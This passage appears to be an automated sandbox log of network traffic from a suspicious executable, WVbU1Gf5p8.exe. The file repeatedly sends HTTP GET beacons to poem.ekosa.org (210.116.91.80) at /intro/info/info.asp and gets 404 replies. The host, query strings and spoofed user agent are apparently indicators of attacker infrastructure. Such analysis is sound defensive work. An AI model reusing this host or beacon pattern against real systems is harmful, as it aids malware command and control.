      208192.168.2.449988210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      209192.168.2.449989210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      21192.168.2.449785210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:08.776441097 CET390OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:09.039418936 CET391INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:08 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      210192.168.2.449990210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      211192.168.2.449991210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      212192.168.2.449992210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      213192.168.2.449993210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      214192.168.2.449994210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      215192.168.2.449995210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      216192.168.2.449996210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      217192.168.2.449997210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      218192.168.2.449998210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      219192.168.2.449999210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      22192.168.2.449786210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:09.309863091 CET392OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:09.571054935 CET392INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:09 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      220192.168.2.450000210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      221192.168.2.450001210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      222192.168.2.450002210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      223192.168.2.450003210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      224192.168.2.450004210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      225192.168.2.450005210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      226192.168.2.450006210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      227192.168.2.450007210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      228192.168.2.450008210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      229192.168.2.450009210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      23192.168.2.449787210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:09.840960979 CET393OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:10.102114916 CET393INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:09 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      230192.168.2.450010210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      231192.168.2.450011210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      232192.168.2.450012210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      233192.168.2.450013210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      234192.168.2.450014210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      235192.168.2.450015210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      236192.168.2.450016210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      237192.168.2.450017210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      238192.168.2.450018210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      239192.168.2.450019210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      24192.168.2.449788210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:10.567939997 CET394OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:10.835975885 CET395INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:10 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      240192.168.2.450020210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      241192.168.2.450021210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      242192.168.2.450022210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      243192.168.2.450023210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      244192.168.2.450024210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      245192.168.2.450025210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      246192.168.2.450026210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      247192.168.2.450027210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      248192.168.2.450028210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      249192.168.2.450029210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      25192.168.2.449789210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:11.295078993 CET395OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:11.574569941 CET396INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:10 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      250192.168.2.450030210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      251192.168.2.450031210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      252192.168.2.450032210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      253192.168.2.450033210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      254192.168.2.450034210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      255192.168.2.450035210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      256192.168.2.450036210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      257192.168.2.450037210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      258192.168.2.450038210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      259192.168.2.450039210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      26192.168.2.449790210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:12.345470905 CET397OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:12.610202074 CET397INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:12 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      260192.168.2.450040210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      261192.168.2.450041210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      262192.168.2.450042210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      263192.168.2.450043210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      264192.168.2.450044210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      265192.168.2.450045210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      266192.168.2.450046210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      267192.168.2.450047210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      268192.168.2.450048210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      269192.168.2.450049210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      27192.168.2.449791210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:13.009207964 CET398OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:13.444442034 CET398INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:12 GMT
      Connection: close
      Content-Length: 315
